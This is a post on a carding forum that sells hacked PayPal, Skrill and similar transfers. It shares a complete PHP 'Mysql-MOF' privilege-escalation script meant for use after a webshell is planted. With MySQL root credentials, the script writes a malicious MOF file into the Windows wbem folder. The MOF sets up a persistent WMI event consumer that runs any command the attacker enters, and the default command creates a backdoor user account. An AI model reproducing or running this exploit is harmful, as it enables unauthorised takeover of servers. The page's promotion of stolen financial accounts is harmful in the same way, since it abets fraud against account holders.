We are closing registration and public forum view to Paid & Private in 16 days! CLICK HERE to register FREE.
 
Create an account  

For users privacy, our last domains: CarderHack.com and OmertaHack.net are moved to CardingTeam.ws

Deposit & Withdraw | About Verified Sellers and Escrow | Advertise | Scam Report | Tracking Number Details | ICQ: 717039384

carding forums carding forums
carding forums carding forums
carding forums Paid adv expire in 48 days
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
 
[PHP]Mysql-MOF Local Exploits

#1
When we get a webshell,we can use this script to escalate privileges.

However,we need something at first :
1.Mysql root
2.Windows 2k or 2k3

Code:
<html>
<head><title>Win MOF Shell</title></head>
<body>
<form action="" method="post">
Host:<br/>
<input type="text" name="host" value="127.0.0.1:3306"><br/>
User:<br/>
<input type="text" name="user" value="root"><br/>
Pass:<br/>
<input type="password" name="pass" value=""><br/>
DBname:<br/>
<input type="text" name="dbname" value="mysql"><br/>
Cmd:<br/>
<input type="text" name="cmd" value="net user test test /add" size="35"><br/>
MofPath:<br/>
<input type="text" name="mofname" value="c:/windows/system32/wbem/mof/hacking.mof" size="35"><br/>
<input type="submit" value="Exploit"><br/>
</form>
</body>
</html>
<?php
if(isset($_REQUEST['host'])&&isset($_REQUEST['user'])&&isset($_REQUEST['dbname'])&&isset($_REQUEST['cmd'])&&isset($_REQUEST['mofname']))
{
$mysql_server_name=$_REQUEST['host'];
$mysql_username=$_REQUEST['user'];
if(isset($_REQUEST['pass']))
{
  $mysql_password=$_REQUEST['pass'];
}
else
{
  $mysql_password='';
}
$mysql_database=$_REQUEST['dbname'];
$cmdshell=$_REQUEST['cmd'];
$mofname=$_REQUEST['mofname'];
}
else
{
echo "Form Input not enough";
exit;
}
$conn=mysql_connect($mysql_server_name,$mysql_username,$mysql_password,$mysql_database);
$payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\")
instance of __EventFilter as \$EventFilter
{
EventNamespace = \"Root\\\\\\\\Cimv2\";
Name  = \"filtP2\";
Query = \"Select * From __InstanceModificationEvent \"
   \"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \"
   \"And TargetInstance.Second = 5\";
QueryLanguage = \"WQL\";
};
instance of ActiveScriptEventConsumer as \$Consumer
{
Name = \"consPCSV2\";
ScriptingEngine = \"JScript\";
ScriptText =
\"var WSH = new ActiveXObject(\\\\\"WScript.Shell\\\\\")\\\\nWSH.run(\\\\\"$cmdshell\\\\\")\";
};
instance of __FilterToConsumerBinding
{
Consumer = \$Consumer;
Filter = \$EventFilter;
};";
mysql_select_db($mysql_database,$conn);
$sql="select '$payload' into dumpfile '$mofname';";
if(mysql_query($sql))
{
echo "Exploit Success!!!";
}
mysql_close($conn);
?>
Reply
Paid adv. expire in 47 days
CLICK to buy Advertisement !

    Verified & Trusted HACKED Payza, PayPal, Ukash, Ucard, EgoPay, Skrill - TRANSFER [Escrow accepted]




Forum Jump: